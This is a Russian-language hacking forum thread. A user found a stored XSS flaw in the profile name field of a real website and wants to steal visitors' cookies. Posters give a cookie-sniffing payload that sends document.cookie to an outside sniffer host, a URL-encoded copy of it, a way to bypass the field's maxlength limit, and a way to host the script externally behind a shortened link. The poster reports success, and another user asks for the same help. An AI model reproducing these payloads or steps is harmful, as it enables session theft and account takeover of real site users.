Всем привет , у меня такой необычный вопрос , на одном сайте я нашел


xss


уязвимость , допустим я вставляю


">alert('xss')


в поля (Имя)

Все проходит успешно и при заходе на данный профиль мне пишет что уязвимость есть , теперь я хочу вставить следующий скрипт


img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie;


Но дело в том что при вставки данного xss в этом поле она не сохраняется , а причина тому слишком много символов , как я выяснил .

Собственно вопрос : Как можно сделать короче (сократить, уменьшить )


[COLOR="Red"]img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1010.gif?"+document.cookie;


или зашифровать , но чтобы смысл данного скрипта оставался одним и тем же?

Спасибо за внимание .

Спрятать можно:


%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%7 7%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72% 63%20%3D%20%22%68%74%74%70%3A%2F%2F%73%6E%69%66%66 %65%72%2E%78%61%6B%6E%65%74%2E%72%75%2F%73%6D%69%6 C%65%73%2F%69%6D%67%5F%5F%31%30%31%30%2E%67%69%66% 3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69 %65%3B%3C%2F%73%63%72%69%70%74%3E

Убери блокнотом(ctrl+h) все пробелы и в дело!

возможно можно и без (type="text/javascript") не помню точно...

а в твой_скрипт.js пиши что надо, ну типа


img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1010.gif?"+document.cookie;

Не помогло. Мне нужно так чтобы за это http://s017.radikal.ru/i406/1111/e8/4b273c3c75ca.jpg поле , скрипт не вылазил.

URL в студио вида si[это не я]te.ru/script.php?vuln_param=">alert('xss')

URL в студио вида si[это не я]te.ru/script.php?vuln_param=">alert('xss')


Я тебя не понял

Короче адрес уязвимого сайта давай =)

TC скинул адрес, но ничего не написал, где уязвимость

Я тебя не понял


Руководство по пунктам.

1) открываем Opera (именно оперу и никакой другой !!!) и переходим на выбранный сайт

2) Жмём Правой кнопкой - Исходный код страницы

3) Ищем нашу строку с вводом строки и меняем её длину

maxlength="13" на maxlength="1300" к примеру

4) Не выходя из редактирования исходного кода идёшь в левый верхний угол и ищешь там "Применить изменения", что собсно и жмёшь

5) Переходишь на вкладку с сайтом и вбиваешь всю стоку полностью, без предыдущего ограничения.

Если фильтра в php-коде нет, тебя пропустит

Руководство по пунктам.
1) открываем Opera (именно оперу и никакой другой !!!) и переходим на выбранный сайт
2) Жмём Правой кнопкой - Исходный код страницы
3) Ищем нашу строку с вводом строки и меняем её длину
maxlength="13" на maxlength="1300" к примеру
4) Не выходя из редактирования исходного кода идёшь в левый верхний угол и ищешь там "Применить изменения", что собсно и жмёшь
5) Переходишь на вкладку с сайтом и вбиваешь всю стоку полностью, без предыдущего ограничения.
Если фильтра в php-коде нет, тебя пропустит



Большое спасибо , сейчас проверим .

Если сервер рубит длину, то не поможет. Делается проще пареной репы же:

1) делаем файл 1.js

2) в него пишем img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie;

3) заливаем куда угодно на любой хостинг, например на фрихост какой-нибудь

4) идем на u.to, запихиваем туда ссылку на файл 1.js, получаем что-то типа http://u.to/abc123

5) вставляем на сайте вот такой код:

Если нужно еще меньше, то пишем в асю 352223797 - скажу платное решение.

Фильтр стоит , ничего не вышло (

Если сервер рубит длину, то не поможет. Делается проще пареной репы же:
1) делаем файл 1.js
2) в него пишем img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie;
3) заливаем куда угодно на любой хостинг, например на фрихост какой-нибудь
4) идем на u.to, запихиваем туда ссылку на файл 1.js, получаем что-то типа http://u.to/abc123
5) вставляем на сайте вот такой код:

Если нужно еще меньше, то пишем в асю 352223797 - скажу платное решение.


Получилось , спасибо огромное .

Получилось , спасибо огромное .


Лол.. я тебе в четвёртом посте тоже самое посоветовал...

Хотя это конечно моя вина, я забыл поставить циферки 1) 2) 3)

Лол.. я тебе в четвёртом посте тоже самое посоветовал...
Хотя это конечно моя вина, я забыл поставить циферки 1) 2) 3)


не получишь ты плюсика от ТС(.... не переживай, всё ещё впереди

Лол.. я тебе в четвёртом посте тоже самое посоветовал...
Хотя это конечно моя вина, я забыл поставить циферки 1) 2) 3)



Я тебя там не понял ))) а тут все понятно ))

подскажи


Если сервер рубит длину, то не поможет. Делается проще пареной репы же:
1) делаем файл 1.js
2) в него пишем img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie;
3) заливаем куда угодно на любой хостинг, например на фрихост какой-нибудь
4) идем на u.to, запихиваем туда ссылку на файл 1.js, получаем что-то типа http://u.to/abc123
5) вставляем на сайте вот такой код:

Если нужно еще меньше, то пишем в асю 352223797 - скажу платное решение.


как сделать 3 пункт добавь в аське

как сделать 3 пункт добавь в аське


Ищешь в гугле:" Бесплатные хостинги с PHP или читай на нашем форуме...там есть раздел такой - большой раздел

Ищешь в гугле:" Бесплатные хостинги с PHP или читай на нашем форуме...там есть раздел такой - большой раздел


Там не нужен пхп =)

пацаны плиз объясните в аське или в скайпе просто срочно надо но вот не допираю как скрипт разместить